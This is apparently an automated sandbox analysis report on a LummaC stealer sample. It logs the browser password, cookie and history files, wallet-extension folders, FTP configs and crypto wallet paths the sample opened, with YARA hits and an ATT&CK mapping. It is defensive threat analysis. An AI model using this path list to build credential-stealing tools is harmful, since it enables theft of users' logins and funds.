                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                    Source: Yara matchFile source: 00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5Z19n7XRT1.exe PID: 3524, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: 0.2.5Z19n7XRT1.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.5Z19n7XRT1.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5Z19n7XRT1.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.5Z19n7XRT1.exe.24e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2160718112.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    Process Injection                    		1
                    Virtualization/Sandbox Evasion                    		2
                    OS Credential Dumping                    		11
                    Security Software Discovery                    		Remote Services1
                    Screen Capture                    		21
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    PowerShell                    		Boot or Logon Initialization Scripts1
                    DLL Side-Loading                    		1
                    Process Injection                    		LSASS Memory1
                    Virtualization/Sandbox Evasion                    		Remote Desktop Protocol1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Deobfuscate/Decode Files or Information                    		Security Account Manager1
                    Process Discovery                    		SMB/Windows Admin Shares41
                    Data from Local System                    		3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
